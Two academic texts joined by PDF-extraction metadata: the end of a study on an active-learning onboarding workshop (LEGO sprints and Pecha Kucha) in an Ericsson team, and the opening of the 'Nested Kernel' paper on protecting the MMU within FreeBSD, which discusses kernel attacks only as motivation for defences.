domain. Meaning that there was a connection between the common discourse and the concrete problem in the team, where the onboarding process was ad-hoc – no formal onboarding process was present, and it was not quality controlled – just as described by other researchers [3][4]. This instance and the generic problem domain were also congruent in the aspect that most novices face challenges in understanding the product in its organizational context [4][5]. The interviews and the research body lead up to the formulation of two learning outcomes that could be added to the onboarding to enhance the effectiveness; technical knowledge, and organizational knowledge. When the state of the team’s onboarding had been investigated and the two learning outcomes established, research within the pedagogical and learning field was consulted to elicit effective ways to reach these learning outcomes. According to Panadero et al. [9] and Dale [8], active learning activities are effective for completing learning objectives and enhancing the learning experience for the participant. An active learning activity can be identified by the participation in, for example hands-on workshops and collaborative lessons where the participants engage with each other to solve a real problem. According to Dale’s [8] cone of experience, the participant can remember 70 to 90 percent of an active learning activity. Activities where the participant do not practice active learning, but rather read or listen, only 10 to 20 percent of the content is remembered. Together with the possible high knowledge retention from active learning [8] and the eventual modest positive impact from team-building [16][18], the idea of an interactive workshop was formulated. Klein et al. [18] suggest that a larger team size (greater than 10) are prone to more positive impact than a smaller team size. Since the workshop initially was supposed to include four teams (a total of around 30 participants), team-building could possibly be anticipated to be beneficial for the teams. Cycle 2 - Artifact Development During this cycle, the artifact was developed based on the idea formulation from cycle 1. After the data collection in cycle 1, the development of an interactive workshop focused on the learning outcomes of technical and organizational knowledge was initiated. This cycle was dedicated to reviewing various examples of active learning workshops within software engineering that focused on enhancing team building and technical skills. During the development of the artifact the works by Panadero er al. [9] and Lynch et al. [12] on LEGO-workshop were used to learn how interactive LEGO-workshops effected the intended learning outcomes. Panadero et al. [9] suggest that the active learning LEGO-workshop that they conducted enhanced and stimulated the learning of the participants compared to other non-active learning activities. The LEGO is meant to act like a method or a proxy to achieve the actual learning outcome – in this case, the organizational knowledge. Lynch et al. [12] imply that their LEGO-workshop to ground agile development principles did not significantly enhance knowledge retention of the participants compared to lectures. However, the LEGO-workshop was conceived as more enjoyable, an aspect that the researchers deem valuable. Miller Beyer’s [15] research on Pecha Kucha presentations compared to plain power point presentation was used to understand the effect of Pecha Kucha as a way of presenting information. In the paper, Miller Beyer suggests that Pecha Kucha was useful compared to power point, in the sense that it was more enjoyable during creation and had higher quality during presentation. Pecha Kucha (20x20) [10] is a way of presenting a topic in a concise and efficient way. It can be described as a form of Power Point presentations where each slide is shown for exactly 20 seconds, and the presenter is only allowed to use 20 slides. As mentioned earlier, listening merely amounts to around 20 percent remembrance in the participant [8]. To make the Pecha Kucha presentations become an active learning activity, the team was supposed to create the presentations together, and as a final task in the workshop – discuss and present what they learned during the presentation. In this way, the team would participate in designing and performing a presentation which can yield up to 90 percent knowledge retention, according to Dale’s [8] cone. Cycle 3 - Artifact Evaluation and Analysis During this cycle, the workshop was evaluated and analyzed. Two types of evaluation data was collected, quantitative in the form of surveys and qualitative in the form of observations of the participants during the workshop. Final Evaluation of the Learning Outcomes. When the design and implementation of the learning activity were done, the workshop and the learning outcomes were evaluated. The evaluation was done according to the first two levels of Kirkpatrick’s [11] four levels of training evaluation model. Below follows a description of all four levels of evaluation. In this study, only level 1 and level 2 were conducted due to time constraints. Level 1 – Reaction: This level aims to elicit the feelings, perceptions and experience the participant had of the training. For this study, a survey was conducted to understand how the participants experienced and valued the workshop. This assessment was focused on the organizational knowledge outcome. Level 2 – Learning: This level aims to elicit the learning outcomes of the training. For this study, a test about the other team’s product before the workshop to assess the knowledge of the participants, and the exact same test after the workshop to assess the learning outcome of the activity. This assessment was focused on the technical knowledge outcome. Level 3 – Behavior: This level aims to elicit how the participants practice and utilize their learning, and if and how it has changed their behavior. Level 4 – Results: This level aims to elicit the effect the learning outcomes have on the business and the working environment. Qualitative data – Observations: During the workshop, the groups were observed in their way of working together and in their communication. These observations were used to document the possible changes in behavioral or communication patterns of the participants throughout the workshop. The observations were recorded through field notes. When the observation was completed, the field notes were studied and coded to elicit common or special patterns or behaviors among the participants. D. Threats to Validity The threats to validity of this study are recognized and analyzed below. Construct validity, is under threat by not finding a valid model or method according to which the evaluation of the effectiveness of the learning activity can be measured. To mitigate this threat, a recognized model for onboarding or training effectiveness evaluation was used. This model was first developed in 1959, and has been refined by its creator, Kirkpatrick, as well other researchers. The model has been widely used for purposes similar to this study ever since its creation [13][14]. Internal validity, could be under threat since I personally know all the team members. The relationship could cause them to give more positive feedback during evaluation of the new learning activity than would it have been introduced by someone they do not know. To mitigate this threat, the risk will be brought up with the team members and we will discuss how false positive feedback can have negative effects on the study. Emphasis during evaluation will be laid on the importance of honest answers and opinions. Even though caution was taken during the study to avoid internal validity, the questions of the workshop evaluation could lead the participants to give exaggerated positive feedback. The positive results of the workshop should therefore be interpreted with vigilance. Another threat is that the evaluation and measurement of the effectiveness of the learning activity is not valid or does not have clear definitions. Because of this, it is important to use a recognized and detailed evaluation model and measurements, to ensure that the results and outcomes of this study are credible. The extensively used Kirkpatrick [11] was used for this purpose. The small team size and whether that sample is generalizable for the population or other companies might be a threat to external validity. However, in favor of data of quantitative measure, this study narrows down to qualitative data points that will be studied in depth over time. The sample is small, and it is not possible to establish whether or not the data collected in the study is generalizable for a wider population. But, as mentioned, this study is context-dependent in its nature. The reliability of the study is threatened regarding the evaluation and measurement of the learning activity. If there is no recognized model according to which the effectiveness of the learning activity is measured, this study’s results cannot be repeated in any other setting. As above-mentioned, Kirkpatrick’s model was used. IV. RESULTS In this section, the answers to each research question are presented. RQ1: What are the intended learning outcomes of the onboarding process in the organization CNA within Ericsson, and what learning activities are involved to complete the outcomes? The data collected during the five interviews of cycle one (Idea Initialization) indicates that there is no structured or formulated onboarding process existing for the team. However, for new Ericsson employees there is an “onboarding-event” where the new employees attend presentations about the company’s goals, products and different organizations. This is not related to anything concrete about the product-detailed level of the team, but more of an overview of the entire company Ericsson. The interviews also indicated that there are no formulated learning outcomes of the onboarding, and no evaluation or quality control. “They try to communicate, in a way. They tell me to work on this thing, in this way. And I say, for what reason? And they say, well, now we’re working on it. But why? It’s a part of the system. Yes, it’s a part of the system I know but. Its these questions which doesn’t really fit anywhere. My questions aren’t being answered.” Says one interviewee as he/she explains if and how learning outcomes of the onboarding were presented to them. Regarding the onboarding specifics for this team, in the interviews, three areas of improvements could be found common among all interviews. These are: - Need of organizational context. "In my case, as developer, I would expect to learn first about the organiza- tional environment, in general about the company. And then where is your team and what you are going to do located in that general map for the company. I mean, from the big thing, to the specific thing. That would be easier for everyone, who get onboarding in Ericsson. And I didn’t get that map. So that was hard. It’s a complete world, and there are many abbreviations. So I was lost in the beginning. Could be much easier if I had a one page map. This is Ericsson, this our area, this our team, and this is what the team will do for this product, and then for this area, and then for Ericsson.” One example of an interviewee expressing his/her feeling of lack of organizational context in the onboarding process. • Need of technical context. “They think like just because you are watching the RBS [an Ericsson product], its like magically trying to get into your head. Which is, nah, that’s the wrong way of thinking about it. But that’s what they want basically. They think that people learn way too quick” • Need of knowledge of whom to ask. “I had problem with some [Internal Product] thing, and I sent emails to [Other Team] asking if they know anything. And they are like, no, but we are working on it. I was working on this for like a week and then [Team Member] comes by and says like: Hey, have you asked this guy? And I was just like, No. And then I email him and then 5 minutes later he just send me this 33 pages long API content, and I’m like, You have been sitting on that one? That’s kind of a good way of explaining how things work here, some people know it. And you gotta know who to find. And you are probably not gonna find them, until its too late.” An example of how an interviewee experienced finding people outside of the team to ask for help. The interviews also conveyed that the onboarding tasks are product-related in the sense that the novices were always working on items from the back-log. They do, however, not get much guidance when taking on the back-log items, but have to rely on help and time from their colleagues. “And I started to ask questions to others, whoever were like, if I feel like they have some time for me. I started to learn by asking questions actually.” This is one interviewee expressing how he/she learned about the back-log items through asking other team members. “And I’ve been on my own basically. I could ask people. [Manager] told I should ask people, and I did. But still its my own way of coping with it. I like to learn by myself, but I don’t think everyone like to do that.” Another interviewee on the same matter. RQ2: What learning activities can be introduced to the current onboarding process to enhance product-related learning? Based on the data retrieved from RQ1, to answer RQ2, a workshop was developed and conducted. A. The Artifact The artifact had the form of a learning activity aimed to enhance the product-related learning of the onboarding process. The learning activity was a two hour long workshop divided into two learning outcomes: • technical knowledge, which entails the knowledge about other products, projects and tools that were developed by other teams within the organization, and how the team’s own product might be related to said items, • organizational knowledge, which entails the knowledge about the technical skills and knowledge of other teams within the organization. For technical knowledge, a presentation part was performed. The teams had to design presentations according to the Pecha Kucha style [10], where each presentation slide is shown for exactly 20 seconds. This creates concise and clear presentation that do not risk getting stuck in too much detail. Before the workshop, guidelines about how to create Pecha Kucha presentations were sent out to all participants via email. For organizational knowledge, a LEGO building part was performed. Here, the teams were divided into groups with members from both teams. The groups had the task to build a Lego city together. There was a backlog with 11 items, each representing a building or item of the city (such as, shop or bus). All together, 55 minutes were dedicated to the Lego building. These 55 minutes were divided into three “Sprints”. The first two sprints lasted for 20 minutes, and the third for 15 minutes. During a sprint, the team chose as many items as they estimate that they can finish. They built the item together, and when they were done, they integrated with each other’s items to form a city. In the end of each sprint, the groups evaluated their building process, their strategies and the result. By practicing team-work during the LEGO building, the learning outcome can be reached through actively working on a hands-on problem together with the people relevant to increase the organizational knowledge. The LEGO-building acts as a simulation of real world problems, where the participants have to collaborate, come up with strategies and communicate to solve the problems [9][12]. These are skills that are important to achieve organizational knowledge – being able to work and interact with other teams. The whole workshop ended with each team discussing and summarizing their learnings during the workshop. Bloom’s [19] taxonomy is a framework to design and evaluate learning objective or learning outcomes. It is however, not to be mistaken as knowledge evaluation of a student. The framework aims to define the cognitive process while learning new skills. The framework is characterized by sequential levels of difficulties, where the first level has to be mastered before the second can be understood. The technical knowledge outcome intends to cover the levels: • (1) knowledge – remembering the information presented by the other team, such as product and projects, team members’ skills and their Way of Working, • (2) comprehension – being able to understand the other teams product and projects, • (3) application – using the information they remembered and understood from the other team’s while answering the knowledge test after the workshop, • (4) analysis – connecting the products and projects of the other team to their own products and projects, • (5) synthesis – summarizing the important parts of the other team’s presentation to use in the final presentation at the end of the workshop, • (6) evaluation – presenting what they learned at the end of the workshop. The organizational knowledge outcome intends to cover the levels: • (1) knowledge – remembering the names and skills of other team members, • (2) comprehension – being able to understand and communicate the instructions during the workshop together with the other team members, • (3) application – following the instructions to build the LEGO items together with the other team members and interacting with each other to do so, • (4) analysis – analyzing and communicating across the groups to combine the LEGO items to form a coherent LEGO city. This includes comparing building size and building placements and organization, • (5) synthesis – creating the actual LEGO items and LEGO city together, and presenting what they learned at the end of the workshop, • (6) evaluation – evaluation of the group’s own progress during the sprint. This includes being able to describe their building process, strategy and difficulties, and compare these to previous sprints. Initially, four teams within the CNA organization were supposed to take part in the workshop. One of these teams was the sample team. The other three teams were targeted since they are interacting with or working on related projects as the sample team - hence they were important for the sample team to reach the learning outcomes. Due to a busy schedule, only one of the three additional teams were able to attend the workshop, meaning that the sample team and one additional team ended up participating in the workshop. In total, all five members from the sample team, and three members from the other team participated. The teams were divided into three groups during the workshop. The groups were distributed so that each group had one member from the other team. That would enable the possible achievement of the organizational knowledge learning outcome for all participants. B. The Sprints - An Observation During the sprints, the teams were observed to elicit patterns, or changes in behavior over time. Over all, the observations showed unstructured collaboration in two out of three groups during the first sprint. After the first sprint, the collaboration within and between the teams improved. Below follows a chronological summary of the field notes of the observations. Sprint 1: During the first sprint, only one team was working systematically and structured. The team started by gathering a pile of LEGO, and then discussed their building strategy before stating. During the building phase, the team often stopped for discussions, and re-evaluation of their building. All team members in the team were actively taking part in the discussion. In the other two teams, there was no structure. Each member was focused on themselves and their own building, and all members were building on the same thing at the same time without discussions about a shared view for a final result. Instead of stopping to discuss and re-evaluate, it resulted in frequent exclamations about stress and frustration among some members. It also resulted in the buildings falling apart during construction several times, due to too many hands working on the same thing. All teams managed to finish their items on time before the sprint ended. After the first sprint, there was a break of 15 minutes. The plan with the break was to make the participants talk to each other outside of their roles as colleagues. The goal with the break was not revealed to the participants. During the break, the participants all actively took part in discussion about various personal matters, ranging from previous working experience, sports and cultural differences among them. Sprint 2: During the second sprint, the two unstructured teams displayed a difference in their behavior. The systematic team did not show much difference, but continued to work efficiently in the same manner. In the other two teams, the members’ took on different roles. In both teams, one member would take the role of a “gatherer”, collecting the LEGO while the other two members were building. During this sprint, it was also possible to see that they were discussing the intended end results within the teams and making plans on how to build their items accordingly. The noise level in the room also became much lower, due to less frequent exclamations of stress and frustration. The teams put effort to build more complex and esthetically appealing items during this sprint. Interestingly, all teams also started to look at their own and other’s previous items for size references. Sprint 3: In the third sprint, the teams did not display much difference in their behavior compared to sprint 2, but they continued to work systematically and stop for discussions and re-evaluations. After the presentation and LEGO-sessions were done, the teams were asked to discuss within their original development teams what they had learned about the other development team’s members. All participants expressed that they got to know members of the other team better. That they understood that they could work well together under pressure, even though they have different backgrounds. And that if you have a common goal, you can work with anyone sharing that goal. During the presentation, all participants expressed that they feel like it would be easier to cooperate with the other team after this workshop. After the workshop, the team filled in a form where they got to evaluate the workshop. Please see Figure 1-6 for results. Four out of five team members filled in the form. The team also filled in a knowledge test, one before the workshop, and one after. Five out of five team members answered the knowledge tests. The knowledge tests do not show improvement after the workshop. The team members already answered all questions correctly before the workshop. To conclude RQ2, the study showed some indication of improvement regarding the organizational knowledge. The participants expressed through their final presentations during the workshop that the LEGO-building enhanced the collaboration between the two teams. In the workshop survey, the results indicated that the workshop was relevant for their job and that it had stimulated their learning. The knowledge test showed results that the technical knowledge learning outcome was not improved from the workshop. V. DISCUSSION Regarding RQ1, the findings in this study are congruent to the literature describing the general problem [3][4], there was no standardized onboarding process in the team. The team members expressed that they lacked introduction on how to navigate the system – both technical and organizational, and to understand the context in which they are working. This includes the relationship of their products to others, as well as what team or what person to contact when a problem arises. Such an onboarding could be developed in the near future. As of now, the team is newly formed and the area in which they are working is also in the start-up phase in Ericsson, which could explain the lack of a formal onboarding. Regarding RQ4, the evaluation of the workshop implied that the participants found the workshop to be valuable for their job. However, these results are possibly biased since the questions in the survey could be leading towards a positive answer. Another aspect is also that the team members know me (the writer), and I work in their team, which could lead to a more positive evaluation of the workshop than had they not known me. During evaluation of the workshop according to the first two levels of Kirkpatrick’s model, results showed the following: Level 1 - Reaction: The results here indicate that the team members found the workshop to stimulate their learning and that the learning outcomes of the workshop could be of value for them in their future work. Again, these findings are supported by other studies that suggest that active learning activities, such as LEGO building, have a positive effect on the effectiveness and experience of the learning [8][9]. Level 2 - Learning: the Pecha Kucha presentations did not improve the knowledge of the team members. The main reason for this is that the team already had basic knowledge about the products and tools that this other team is developing, another reason could be that the teams did not put enough effort into their presentations, and instead of strictly following the Pecha Kucha principle of concise and effective presentations, the teams crammed a lot of information into the slides and spoke in very high speed. A future suggestion would be to try to allocate time for a Pecha Kucha introduction to all participating teams. Sending guidelines via email did not seem to be enough for the participants to be able to follow the Pecha Kucha concept fully. Interestingly, the break during the workshop show indication that, after chatting freely with each other, the team work improved from being unstructured and centered around the individual’s own building to being cooperative and including discussions about the end result. However, this could also be the cause of the teams feeling more secure in the second sprint. They knew what was expected of them and were able to focus on the anticipated end result. It is not possible to derive which of these two factors play the role of the change, if it was a result of a combination or if it was a different cause all together. According to Buller and Bell [16], Klein et al. [17] and Salas et al. [18], the impact of team-building on team outcomes is rather ambiguous. It is difficult to point to team-building as the main factor among others for improved outcomes. Also in this study, it is not possible to derive exactly what factors that caused the team to perform better after the first sprint. To conclude, a product-related learning activity in the form of a workshop focusing on technical knowledge and organizational knowledge (team-building) through active learning showed indications that the organizational knowledge could be enhanced. The results points towards an improvement on the team-building. However, there is a risk of biased outcomes due to the fact that the writer is a colleague of the sample team. The short time is also a constraint, meaning that to yield strong results, the team needs to be studied over time for evaluation of level 3 and level 4 of Kirkpatrick’s [11] model. According to the knowledge tests, the technical knowledge did not show any indications of improvement after the workshop. The team already displayed good knowledge of the other team’s projects before the workshop. Had all four initial teams been able to participate, the outcome probably would have been different since the other teams do not work as close as the two teams that participated. Therefore the sample team probably do not have as good prior knowledge about their products, and the other teams’ Pecha Kucha presentations might have taught them something. VI. CONCLUSIONS The objective of this paper is to describe the process and the results of how a product-related learning activity impacted the effectiveness of the onboarding in a development team in Ericsson. A product-related and interactive workshop was developed and implemented. The workshop had two product-related learning outcomes: technical knowledge and organizational knowledge. The workshop consisted of two parts: a Pecha Kucha presentation focused on the technical knowledge, and a LEGO-building session focused on team-building to enhance the organizational knowledge. The results of the evaluation of this workshop suggest that it might have had a positive impact on the onboarding, since results indicate a moderate enhancement of the organizational knowledge of the members of the development team. It is however, not possible to declare team-building as the factor of this enhancement in organizational knowledge. The workshop showed no indication on improved technical knowledge among the team members. Future work will include following up this study with an evaluation according to Kirkpatrick’s [11] evaluation model level 3 - where the everyday behavior and social interaction between the two teams will be evaluated through interviews and observations, and level 4 - where the manager will be interviewed to understand if and how the quality of the team’s every day work has been impacted. Further, when time can be allocated with the other teams that were intended to join the workshop, one more workshop will be conducted and evaluated according to the same model. Should the second workshop yield a modest positive impact on the learning of the team members and the effectiveness of the onboarding, there is a possibility this workshop could be implemented in other teams within CNA as well. If time and circumstances allow, that future work could be done as an update or continuation of this study. VII. ACKNOWLEDGEMENTS I thank my supervisor Jan-Philipp Steghöfer for the support and interesting discussions. REFERENCES
{"Source-Url": "https://gupea.ub.gu.se/bitstream/2077/62524/1/gupea_2077_62524_1.pdf", "len_cl100k_base": 8694, "olmocr-version": "0.1.53", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 28267, "total-output-tokens": 10293, "length": "2e13", "weborganizer": {"__label__adult": 0.00083160400390625, "__label__art_design": 0.001979827880859375, "__label__crime_law": 0.0007886886596679688, "__label__education_jobs": 0.41162109375, "__label__entertainment": 0.00026035308837890625, "__label__fashion_beauty": 0.0005178451538085938, "__label__finance_business": 0.005279541015625, "__label__food_dining": 0.0010175704956054688, "__label__games": 0.0014657974243164062, "__label__hardware": 0.0011415481567382812, "__label__health": 0.00112152099609375, "__label__history": 0.0006909370422363281, "__label__home_hobbies": 0.0005464553833007812, "__label__industrial": 0.0012073516845703125, "__label__literature": 0.0013055801391601562, "__label__politics": 0.0005707740783691406, "__label__religion": 0.000865936279296875, "__label__science_tech": 0.0193939208984375, "__label__social_life": 0.0008311271667480469, "__label__software": 0.0111846923828125, "__label__software_dev": 0.53466796875, "__label__sports_fitness": 0.0007843971252441406, "__label__transportation": 0.0013751983642578125, "__label__travel": 0.0005846023559570312}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 48239, 0.0179]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 48239, 0.4939]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 48239, 0.96522]], "google_gemma-3-12b-it_contains_pii": [[0, 214, false], [214, 1628, null], [1628, 7077, null], [7077, 13447, null], [13447, 19681, null], [19681, 25585, null], [25585, 31493, null], [31493, 37540, null], [37540, 40189, null], [40189, 46672, null], [46672, 48239, null]], "google_gemma-3-12b-it_is_public_document": [[0, 214, true], [214, 1628, null], [1628, 7077, null], [7077, 13447, null], [13447, 19681, null], [19681, 25585, null], [25585, 31493, null], [31493, 37540, null], [37540, 40189, null], [40189, 46672, null], [46672, 48239, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 48239, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 48239, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 48239, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 48239, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 48239, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 48239, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 48239, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 48239, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 48239, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 48239, null]], "pdf_page_numbers": [[0, 214, 1], [214, 1628, 2], [1628, 7077, 3], [7077, 13447, 4], [13447, 19681, 5], [19681, 25585, 6], [25585, 31493, 7], [31493, 37540, 8], [37540, 40189, 9], [40189, 46672, 10], [46672, 48239, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 48239, 0.0]]}
olmocr_science_pdfs
2024-12-10
2024-12-10
ab0a95193866eece7b0562356b96642b33244561
Nested Kernel: An Operating System Architecture for Intra-Kernel Privilege Separation Nathan Dautenhahn, Theodoros Kasampalis, Will Dietz, John Criswell, and Vikram Adve 1University of Illinois at Urbana-Champaign, 2University of Rochester {dautenh1, kasampa2, wdietz2, vadve}@illinois.edu, criswell@cs.rochester.edu Abstract Monolithic operating system designs undermine the security of computing systems by allowing single exploits anywhere in the kernel to enjoy full supervisor privilege. The nested kernel operating system architecture addresses this problem by “nesting” a small isolated kernel within a traditional monolithic kernel. The “nested kernel” interposes on all updates to virtual memory translations to assert protections on physical memory, thus significantly reducing the trusted computing base for memory access control enforcement. We incorporated the nested kernel architecture into FreeBSD on x86-64 hardware while allowing the entire operating system, including untrusted components, to operate at the highest hardware privilege level by write-protecting MMU translations and de-privileging the untrusted part of the kernel. Our implementation inherently enforces kernel code integrity while still allowing dynamically loaded kernel modules, thus defending against code injection attacks. We also demonstrate that the nested kernel architecture allows kernel developers to isolate memory in ways not possible in monolithic kernels by introducing write-mediation and write-logging services to protect critical system data structures. Performance of the nested kernel prototype shows modest overheads: < 1% average for Apache and 2.7% for kernel compile. Overall, our results and experience show that the nested kernel design can be retrofitted to existing monolithic kernels, providing important security benefits. Categories and Subject Descriptors D.4.6 [Operating Systems]: Organization and Design Keywords intra-kernel isolation; operating system architecture; malicious operating systems; virtual memory 1. Introduction Critical information protection design principles, e.g., fail-safe defaults, complete mediation, least privilege, and least common mechanism [34, 40, 41], have been well known for several decades. Unfortunately, monolithic commodity operating systems (OSes), like Windows, Mac OS X, Linux, and FreeBSD, lack sufficient protection mechanisms with which to adhere to these design principles. As a result, these OS kernels define and store access control policies in main memory which any code executing within the kernel can modify. The impact of this default, shared-everything environment is that the entirety of the kernel, including potentially buggy device drivers [12], forms a single large trusted computing base (TCB) for all applications on the system. An exploit of any part of the kernel allows complete access to all memory and resources on the system. Consequently, commodity OSes have been susceptible to a range of kernel malware [27] and memory corruption attacks [5]. Even systems employing features such as non-executable pages, supervisor-mode access prevention, and supervisor-mode execution protection are susceptible to both user level attacks [25] and kernel level threats that directly disable these protections. Traditional methods of applying these principles in OS kernels either completely abandon monolithic design (e.g., microkernels [3, 9, 28]) or rely upon transparent enforcement of isolation via an external virtual machine monitor (VMM) [15, 35, 44, 55, 56]. Microkernels require extensive redesign and implementation of the operating system. VMMs suffer from both performance issues and a lack of semantic knowledge at the OS level to transparently support protection easily; also, generating semantic knowledge has been shown to be circumventable [6]. More recent techniques to split existing commodity operating systems into multiple protection domains using page protections [46] or software fault isolation (SFI) [18] incur high overhead and continue to trust “core” kernel code (which may not be all that trustworthy [15, 16]). To address this problem, we present a new OS organization, the nested kernel architecture, which restricts MMU control to a small subset of kernel code, effectively “nesting” a memory protection domain within the larger kernel. The key design feature in the nested kernel architecture is that a very small portion of the kernel code and data operate within an isolated environment called the nested kernel; the rest of the kernel, called the outer kernel, is untrusted. The nested kernel architecture can be incorporated into an existing monolithic commodity kernel through a minimal reorganization of the kernel design, as we demonstrate using FreeBSD 9.0. The nested kernel isolates and mediates modifications to itself and other protected memory by 1) configuring the MMU such that all mappings to protected pages (minimally the page-table pages (PTPs)) are read-only, and 2) ensuring that those policies are enforced at runtime while the untrusted code is operating. Although similar to a microkernel, the nested kernel only requires MMU isolation and maintains a single monolithic address space abstraction between trusted and untrusted components. We present a concrete prototype of the nested kernel architecture, called PerspicuOS, that implements the nested kernel design on the x86-64 architecture. PerspicuOS introduces a novel isolation technique where both the outer kernel and nested kernel operate at the same hardware privilege level—contrary to isolation in a microkernel where untrusted code operates in user-mode. PerspicuOS enforces read-only permissions on outer kernel code by employing existing, simple hardware mechanisms, namely the MMU, IOMMU, and the Write-Protect Enable (WP) bit in CR0, which enforces read-only policies even on supervisor-mode writes. By using the WP-bit, PerspicuOS efficiently toggles write-protections on transitions between the outer kernel and nested kernel without swapping address spaces or crossing traditional hardware privilege boundaries. PerspicuOS ensures that the outer kernel never disables write-protections (e.g., via the WP-bit) by 1) de-privileging the outer kernel code and 2) maintaining that de-privileged code state by enforcing lifetime kernel code integrity—a key security property explored by several previous works, most notably SecVisor and NICKLE. PerspicuOS de-privileges outer kernel code by replacing instances of writes to CR0 with invocations of nested kernel services and enforces lifetime kernel code integrity by restricting outer kernel code execution to validated, write-protected code. In this way PerspicuOS creates two virtual privileges within the same hardware privilege level, thus virtualizing ring 0. By isolating the MMU, the nested kernel architecture can enforce intra-kernel memory isolation policies that trust only the nested kernel. Therefore, the nested kernel architecture exposes two intra-kernel write-protection services to kernel developers: write-mediation and write-logging. Write-mediation enables kernel developers to deploy security policies that isolate and control access to critical kernel data, including kernel code. In some cases, data may require valid updates from a large portion of the kernel, making it hard to protect kernel objects in place, or otherwise not have an applicable write-mediation policy; consequently, we present the write-logging interface that ensures all modifications to protected kernel objects are recorded (a design principle suggested by Saltzer et al. [41]). To demonstrate the benefit of the write-mediation and write-logging facilities—for enhancing commodity OS security—we present three intra-kernel write-protection policies and applications. First, we introduce the write-once mediation policy that only allows a single update to protected data structures, and apply it to protect the system call vector table, defending against kernel call hooking [27]. In general, the write-once policy presents a novel defense against non-control data attacks [11]. Second, we introduce the append-only mediation policy that only allows append operations to list type data structures, and apply it to protect data generated by a system call logging facility. Additionally, the system call logging facility guarantees invocation of monitored events, a feature made possible by PerspicuOS’s code integrity property, and therefore supports a pivotal feature required by a large class of security monitors. Third, we deploy a write-logging policy to track modifications to FreeBSD’s process list data structures, allowing our system to detect direct kernel object manipulation (DKOM) attacks used by rootkits to hide malicious processes [27]. We have retrofitted the nested kernel architecture into an existing commodity OS: the FreeBSD 9.0 kernel. Our experimental evaluation shows that this reorganization requires approximately 2000 lines of FreeBSD code modifications while significantly reducing the TCB of memory isolation code to less than 5000 lines of nested kernel code. Our prototype also demonstrates that it is feasible to completely remove MMU modifying instructions from the untrusted portion of the kernel while allowing it to operate in ring 0. Furthermore, our experiments show that the nested kernel architecture incurs very low overheads for relatively OS-intensive system benchmarks: < 1% for Apache and 2.7% for a full kernel compile. In summary, the key contributions of this paper include - A new OS organization strategy, the nested kernel architecture, which nests, within a monolithic kernel, a higher privilege protection domain that enables kernel developers to explicitly apply intra-kernel security policies through the use of write-mediation and write-logging services. - A novel x86-64 implementation of the nested kernel architecture, PerspicuOS, that virtualizes supervisor privilege, thereby keeping the outer kernel and the nested kernel at the highest protection level; PerspicuOS uses only the MMU and control registers to protect memory, in lieu of VMM extensions, expensive page table manipulation, or costly compiler techniques. - An evaluation of three intra-kernel memory access control policies: a write-once policy to protect access to the system call table, a write-logging policy that detects rootkits attempting to hide processes, and an append-only system call logging facility with incorruptible logs and guaranteed invocation. - An OS design that provides lifetime kernel code integrity, defending against a large class of kernel malware. 2. Nested Kernel Approach The primary insight and contribution of the nested kernel architecture is to demonstrate how to virtualize a minimal subset of hardware functionality, specifically the MMU, to guarantee mediation and therefore isolation of intra-kernel protection domains. By virtualizing the MMU, the nested kernel architecture enables a new set of protection policies based upon physical page resources and their mappings within the kernel. This section presents the nested kernel architecture overview, our foundational design principles, and the challenges of virtualizing the MMU; it concludes with a description of the nested kernel write protection service made available to kernel developers. 2.1 System Overview The nested kernel architecture partitions and reorganizes a monolithic kernel into two privilege domains: the nested kernel and the outer kernel. The nested kernel is a subset of the kernel’s code and data that has full system privilege, and most importantly, the nested kernel has sole privilege to modify the underlying physical MMU (pMMU) state. The nested kernel mediates outer kernel modifications to the MMU via a virtual interface, which we refer to as the virtual MMU (vMMU). The outer kernel is then modified to use the vMMU. Similar to previous work [15, 43], the nested kernel architecture isolates pMMU updates at the final stage of creating a virtual to physical translation: the point at which a virtual-to-physical translation is made active on the processor (i.e., when the processor can use the translation). For example, on the x86-64, address mappings are added to the system by storing a value to a virtual memory location, called a page-table entry (PTE), that resides on a page-table page (PTP) [2]. By selecting this abstraction, the outer kernel still manages all aspects of the virtual memory subsystem; however, the nested kernel interposes on all pMMU updates, thereby allowing the nested kernel to isolate the pMMU and enforce any other access control policy in the system, such as the one used to protect nested kernel code and data. 2.2 Design Principles The nested kernel architecture comprises the mechanism and interface to establish virtual address mappings. As such, we seek to accomplish the following: Separate resource control (e.g., policy) from protection mechanism (e.g., MMU). We seek the lowest level of abstraction possible to virtualize the MMU, providing only a mechanism that performs updates to virtual-to-physical address mappings. This principle has several benefits: it minimizes the TCB of the privileged domain, maximizes the portability of the nested kernel, and gives maximum flexibility to the types of policies implemented in the outer kernel while maintaining isolation of the nested kernel. Operating system co-design and explicit interface. OS designers are experts in how their systems work: they represent the best opportunity to enhance the security of the system. Therefore, the nested kernel architecture presents a unified design to realize protections explicitly within the OS rather than transparently enforcing protections via external tools, such as in the case with prior work [35, 43, 44]. Privilege separation based upon MMU state, not instructions. Traditionally, systems use the notion of rings of protection, where each ring prescribes what instructions may be executed by code in that ring. In contrast, we enforce privilege separation in terms of access to the pMMU, including both memory (e.g., PTPs) and CPU state (e.g., WP-bit in CR0). Minimal architecture dependence. We want to make the nested kernel architecture design as hardware agnostic as possible, assuming only a hardware paging mechanism with page-granularity protections and the ability to enforce write-protectors on outer kernel code. Fine grained resource control. The protections enabled by virtualizing the MMU can be expressed in many ways; we seek to enable fine grained resource control, i.e., protections at byte-level granularity, so that intra-kernel isolation policies can be applied to 